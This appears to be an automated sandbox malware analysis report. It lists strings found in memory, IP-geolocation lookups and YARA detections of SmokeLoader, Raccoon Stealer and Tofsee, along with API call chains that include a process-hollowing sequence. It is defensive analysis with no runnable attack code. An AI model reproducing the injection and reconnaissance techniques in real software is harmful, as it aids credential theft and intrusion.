Source: 2531.exe, 00000019.00000002.500877876.0000000002FE1000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Endpoint/VerifyScanRequestResponse
Source: 2531.exe, 00000019.00000002.500877876.0000000002FE1000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: 2531.exe, 00000019.00000002.500877876.0000000002FE1000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: svchost.exe, 0000000A.00000002.307260277.0000021A8B813000.00000004.00000001.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.275635514.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: svchost.exe, 00000008.00000002.495267395.0000029B8963E000.00000004.00000001.sdmp String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000008.00000002.495267395.0000029B8963E000.00000004.00000001.sdmp String found in binary or memory: https://%s.xboxlive.com
Source: 2531.exe, 00000019.00000002.506388354.0000000003466000.00000004.00000001.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: svchost.exe, 00000008.00000002.495267395.0000029B8963E000.00000004.00000001.sdmp String found in binary or memory: https://activity.windows.com
Source: 2531.exe, 00000019.00000002.501218025.000000000302E000.00000004.00000001.sdmp String found in binary or memory: https://api.ip.sb
Source: 2531.exe String found in binary or memory: https://api.ip.sb/geoip
Source: 2531.exe, 00000012.00000002.384825667.0000000003B49000.00000004.00000001.sdmp, 2531.exe, 00000019.00000002.494008632.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: 2531.exe, 00000012.00000002.384825667.0000000003B49000.00000004.00000001.sdmp, 2531.exe, 00000019.00000002.501218025.000000000302E000.00000004.00000001.sdmp, 2531.exe, 00000019.00000002.494008632.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://api.ipify.org
Source: svchost.exe, 0000000A.00000003.306763488.0000021A8B861000.00000004.00000001.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000008.00000002.495267395.0000029B8963E000.00000004.00000001.sdmp String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: 2531.exe, 00000019.00000002.506388354.0000000003466000.00000004.00000001.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: svchost.exe, 00000008.00000002.495267395.0000029B8963E000.00000004.00000001.sdmp String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000A.00000003.306778711.0000021A8B85A000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000A.00000003.306778711.0000021A8B85A000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000A.00000003.306763488.0000021A8B861000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000A.00000002.307382765.0000021A8B83D000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000A.00000003.306778711.0000021A8B85A000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000A.00000003.306763488.0000021A8B861000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000A.00000002.307447887.0000021A8B84E000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000A.00000003.306778711.0000021A8B85A000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000A.00000003.306763488.0000021A8B861000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000A.00000002.307382765.0000021A8B83D000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000A.00000003.306763488.0000021A8B861000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000A.00000003.306763488.0000021A8B861000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000A.00000003.306763488.0000021A8B861000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000A.00000003.306867004.0000021A8B840000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000A.00000003.306867004.0000021A8B840000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000A.00000003.306763488.0000021A8B861000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000A.00000003.306867004.0000021A8B840000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: 2531.exe, 00000019.00000002.506388354.0000000003466000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 2531.exe, 00000019.00000002.506388354.0000000003466000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 2531.exe, 00000019.00000002.506388354.0000000003466000.00000004.00000001.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 0000000A.00000003.306778711.0000021A8B85A000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000A.00000003.306778711.0000021A8B85A000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000A.00000003.306778711.0000021A8B85A000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000A.00000002.307447887.0000021A8B84E000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000A.00000003.306763488.0000021A8B861000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000A.00000002.307382765.0000021A8B83D000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000A.00000003.284961367.0000021A8B832000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: 2531.exe, 00000019.00000002.501218025.000000000302E000.00000004.00000001.sdmp String found in binary or memory: https://icanhazip.com
Source: 2531.exe, 00000012.00000002.384825667.0000000003B49000.00000004.00000001.sdmp, 2531.exe, 00000019.00000002.494008632.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy
Source: 2531.exe, 2531.exe, 00000019.00000002.494008632.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: 2531.exe, 00000019.00000002.501218025.000000000302E000.00000004.00000001.sdmp, 2531.exe, 00000019.00000002.501365807.0000000003050000.00000004.00000001.sdmp String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 2531.exe, 00000019.00000002.506388354.0000000003466000.00000004.00000001.sdmp String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 2531.exe, 00000019.00000002.506388354.0000000003466000.00000004.00000001.sdmp String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: svchost.exe, 0000000A.00000002.307382765.0000021A8B83D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000A.00000002.307260277.0000021A8B813000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.307382765.0000021A8B83D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000A.00000003.284961367.0000021A8B832000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000A.00000003.306847212.0000021A8B845000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000A.00000003.284961367.0000021A8B832000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000A.00000002.307371626.0000021A8B83B000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000A.00000002.307447887.0000021A8B84E000.00000004.00000001.sdmp String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: 2531.exe, 00000019.00000002.501218025.000000000302E000.00000004.00000001.sdmp String found in binary or memory: https://wtfismyip.com/text
Source: 2531.exe, 00000019.00000002.501218025.000000000302E000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: 2531.exe, 00000019.00000002.506388354.0000000003466000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown HTTPS traffic detected: 95.216.186.40:443 -> 192.168.2.5:49730 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected SmokeLoader
Source: Yara match File source: 00000001.00000002.299990190.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.383261410.0000000000591000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.300060611.00000000004D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.383179022.0000000000570000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 24.2.webgfvd.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.bNdOhKPy0F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.1.webgfvd.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.bNdOhKPy0F.exe.400000.0.unpack, type: UNPACKEDPE
Yara detected SmokeLoader
Source: Yara match File source: 0000002A.00000002.494235965.00000000003E1000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.496689434.00000000032A1000.00000040.00000001.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: 1D31.exe, 00000011.00000002.353289761.000000000070A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 00000022.00000003.440389485.0000000004FD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.447043795.0000000004EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.429961512.0000000004FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.472532667.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.474383146.0000000004F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.443191726.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 31.2.6ACA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.3.6ACA.exe.4fb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.88A3.exe.4eb0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.88A3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.88A3.exe.4fd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.6ACA.exe.4f10e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.6ACA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.88A3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.88A3.exe.4eb0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.6ACA.exe.4f10e50.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.88A3.exe.4fd0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.3.6ACA.exe.4fb0000.0.unpack, type: UNPACKEDPE

Spam, unwanted Advertisements and Ransom Demands:

barindex
Yara detected Tofsee
Source: Yara match File source: 0000001C.00000002.443994982.00000000033B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.441195671.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.414858920.00000000033F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 28.3.5CDE.exe.33f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.5CDE.exe.33b0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.5CDE.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.5CDE.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
.NET source code contains very large strings
Source: 2531.exe.4.dr, NewtonsoftJsonLinqJPropertyJPropertyList24104.cs Long String: Length: 173010
Source: 18.2.2531.exe.6b0000.0.unpack, NewtonsoftJsonLinqJPropertyJPropertyList24104.cs Long String: Length: 173010
Source: 18.0.2531.exe.6b0000.0.unpack, NewtonsoftJsonLinqJPropertyJPropertyList24104.cs Long String: Length: 173010
Source: 22.2.2531.exe.240000.0.unpack, NewtonsoftJsonLinqJPropertyJPropertyList24104.cs Long String: Length: 173010
Source: 22.0.2531.exe.240000.0.unpack, NewtonsoftJsonLinqJPropertyJPropertyList24104.cs Long String: Length: 173010
Source: 25.0.2531.exe.c20000.0.unpack, NewtonsoftJsonLinqJPropertyJPropertyList24104.cs Long String: Length: 173010
Source: 25.2.2531.exe.c20000.1.unpack, NewtonsoftJsonLinqJPropertyJPropertyList24104.cs Long String: Length: 173010
Contains functionality to call native functions
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 0_2_03290110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 0_2_03290110
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_0040194C Sleep,NtTerminateProcess, 1_2_0040194C
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_00401957 Sleep,NtTerminateProcess, 1_2_00401957
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_0040245F NtOpenKey,NtEnumerateKey,NtEnumerateKey,NtClose, 1_2_0040245F
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_00401968 Sleep,NtTerminateProcess, 1_2_00401968
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_00401972 Sleep,NtTerminateProcess, 1_2_00401972
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_00401976 Sleep,NtTerminateProcess, 1_2_00401976
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_004025EA NtEnumerateKey,NtEnumerateKey,NtClose, 1_2_004025EA
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_004019F2 NtTerminateProcess, 1_2_004019F2
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169600 ZwOpenKey,LdrInitializeThunk, 1_2_6E169600
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16967A NtQueryInformationProcess,LdrInitializeThunk, 1_2_6E16967A
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169660 ZwAllocateVirtualMemory,LdrInitializeThunk, 1_2_6E169660
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169780 ZwMapViewOfSection,LdrInitializeThunk, 1_2_6E169780
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169820 ZwEnumerateKey,LdrInitializeThunk, 1_2_6E169820
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169860 ZwQuerySystemInformation,LdrInitializeThunk, 1_2_6E169860
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1698C0 ZwDuplicateObject,LdrInitializeThunk, 1_2_6E1698C0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1699A0 ZwCreateSection,LdrInitializeThunk, 1_2_6E1699A0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B2E14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E1B2E14
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12C600 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,LdrQueryImageFileKeyOption,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy, 1_2_6E12C600
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1DFE3F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E1DFE3F
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12B630 ZwWaitForKeyedEvent, 1_2_6E12B630
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169E30 ZwCancelWaitCompletionPacket, 1_2_6E169E30
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169E20 ZwCancelTimer2, 1_2_6E169E20
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F3E22 ZwTraceControl,RtlNtStatusToDosError,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error, 1_2_6E1F3E22
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16B650 RtlUnhandledExceptionFilter,ZwTerminateProcess, 1_2_6E16B650
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169650 ZwQueryValueKey, 1_2_6E169650
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B6652 ZwClose,RtlAllocateHeap,memcpy,ZwUnmapViewOfSection, 1_2_6E1B6652
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16B640 RtlUnhandledExceptionFilter,ZwTerminateProcess, 1_2_6E16B640
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16AE70 ZwSetInformationWorkerFactory, 1_2_6E16AE70
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169670 ZwQueryInformationProcess, 1_2_6E169670
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15BE62 ZwProtectVirtualMemory,RtlGetCurrentTransaction,RtlGetCurrentTransaction, 1_2_6E15BE62
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1DBE9B RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 1_2_6E1DBE9B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15DE9E RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap, 1_2_6E15DE9E
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E122E9F ZwCreateEvent,ZwClose, 1_2_6E122E9F
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E123E80 RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E123E80
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F3EBC ZwTraceControl,RtlNtStatusToDosError,RtlSetLastWin32Error, 1_2_6E1F3EBC
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14E6B0 RtlSetThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,RtlSetThreadWorkOnBehalfTicket, 1_2_6E14E6B0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B2EA3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E1B2EA3
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E159ED0 RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId, 1_2_6E159ED0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1696D0 ZwCreateKey, 1_2_6E1696D0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1266D4 RtlInitUnicodeString,ZwQueryValueKey, 1_2_6E1266D4
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8ED6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 1_2_6E1F8ED6
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E122ED8 ZwWaitForAlertByThreadId,ZwWaitForAlertByThreadId, 1_2_6E122ED8
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1696C0 ZwSetInformationProcess, 1_2_6E1696C0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B16FA ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration, 1_2_6E1B16FA
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12B6F0 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError, 1_2_6E12B6F0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E17DEF0 RtlRaiseException,RtlCaptureContext,ZwRaiseException,RtlRaiseStatus, 1_2_6E17DEF0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14E6F9 ZwAlpcSetInformation, 1_2_6E14E6F9
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1696E0 ZwFreeVirtualMemory, 1_2_6E1696E0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169710 ZwQueryInformationToken, 1_2_6E169710
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B6715 memset,memcpy,ZwTraceEvent, 1_2_6E1B6715
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E159702 RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker, 1_2_6E159702
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid, 1_2_6E15E730
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169730 ZwQueryVirtualMemory, 1_2_6E169730
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1DCF30 ZwAlertThreadByThreadId, 1_2_6E1DCF30
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B5F5F RtlInitUnicodeString,ZwOpenFile,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlAllocateHeap,RtlInitUnicodeString,ZwQueryDirectoryFile,RtlAllocateHeap,memcpy,RtlFreeHeap,ZwClose, 1_2_6E1B5F5F
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169750 ZwQueryInformationThread, 1_2_6E169750
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169740 ZwOpenThreadToken, 1_2_6E169740
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15174B ZwFreeVirtualMemory,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory, 1_2_6E15174B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E160F48 ZwOpenKey,ZwClose,ZwClose,ZwCreateKey,RtlInitUnicodeStringEx,ZwSetValueKey,RtlInitUnicodeStringEx,ZwSetValueKey,ZwClose, 1_2_6E160F48
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169F70 ZwCreateIoCompletion, 1_2_6E169F70
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E169770 ZwSetInformationFile, 1_2_6E169770
